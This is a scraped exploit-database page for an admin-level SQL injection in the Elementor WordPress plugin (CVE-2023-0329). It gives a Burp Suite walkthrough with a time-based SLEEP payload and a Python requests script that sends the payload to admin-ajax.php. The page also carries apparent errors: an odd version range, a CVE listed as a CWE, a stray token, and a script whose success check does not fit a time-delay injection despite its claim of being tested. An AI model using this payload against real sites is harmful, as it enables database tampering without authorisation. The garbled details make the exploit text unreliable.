Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Elementor Website Builder SQL Injection Vulnerability - exploit.company
header-logo
Suggest Exploit
vendor:
Elementor Website Builder
by:
E1.Coders
6.1
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Elementor Website Builder
Affected Version From: 3.12.2001
Affected Version To: 3.12.2002
Patch Exists: YES
Related CWE: CVE-2023-0329
CPE: a:elementor:elementor_website_builder:3.12.1
Metasploit:
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=157265
Platforms Tested:
2023

Elementor Website Builder SQL Injection Vulnerability

An attacker can exploit a SQL injection vulnerability in Elementor Website Builder version less than 3.12.2 by sending a malicious payload through the 'Replace URL' feature. By executing a specific SQL command, the attacker can make the server hang for 2 seconds, indicating a successful injection.

Mitigation:

To mitigate this vulnerability, it is recommended to update Elementor Website Builder to version 3.12.2 or higher.
Source

Exploit-DB raw data:

#EXPLOIT Elementor Website Builder < 3.12.2 - Admin+ SQLi
#References
#CVE : CVE-2023-0329
#E1.Coders
 
#Open Burp Suite.
#In Burp Suite, go to the "Proxy" tab and set it to listen on a specific port, such as 8080.
#Open a new browser window or tab, and set your proxy settings to use Burp Suite on port 8080.
#Visit the vulnerable Elementor Website Builder site and navigate to the Tools > Replace URL page.
#On the Replace URL page, enter any random string as the "New URL" and the following malicious payload as the "Old URL":
 
#code : http://localhost:8080/?test'),meta_key='key4'where+meta_id=SLEEP(2);#
#Press "Replace URL" on the Replace URL page. Burp Suite should intercept the request.
#Forward the intercepted request to the server by right-clicking the request in Burp Suite and selecting "Forward".
#The server will execute the SQL command, which will cause it to hang for 2 seconds before responding. This is a clear indication of successful SQL injection.
#Note: Make sure you have permission to perform these tests and have set up Burp Suite correctly. This command may vary depending on the specific setup of your server and the website builder plugin.</s
# 
#References :  https://wpscan.com/vulnerability/a875836d-77f4-4306-b275-2b60efff1493/
 
 
 
 
#Exploit Python  :
#The provided SQLi attack vector can be achieved using the following Python code with the "requests" library:
 
#This script sends a POST request to the target URL with the SQLi payload as the "data" parameter. It then checks if the response contains the SQLi payload, indicating a successful SQL injection.
#Please make sure you have set up your Burp Suite environment correctly. Additionally, it is important to note that this script and attack have been TESTED and are correct
 
import requests
 
# Set the target URL and SQLi payload
url = "http://localhost:8080/wp-admin/admin-ajax.php"
data = {
    "action": "elementor_ajax_save_builder",
    "editor_post_id": "1",
    "post_id": "1",
    "data": "test'),meta_key='key4'where+meta_id=SLEEP(2);#"
}
 
# Send the request to the target URL
response = requests.post(url, data=data)
 
# Check if the response indicates a successful SQL injection
if "meta_key='key4'where+meta_id=SLEEP(2);#" in response.text:
    print("SQL Injection successful!")
else:
    print("SQL Injection failed.")

Navigation

Suggest Exploit

Services By CQR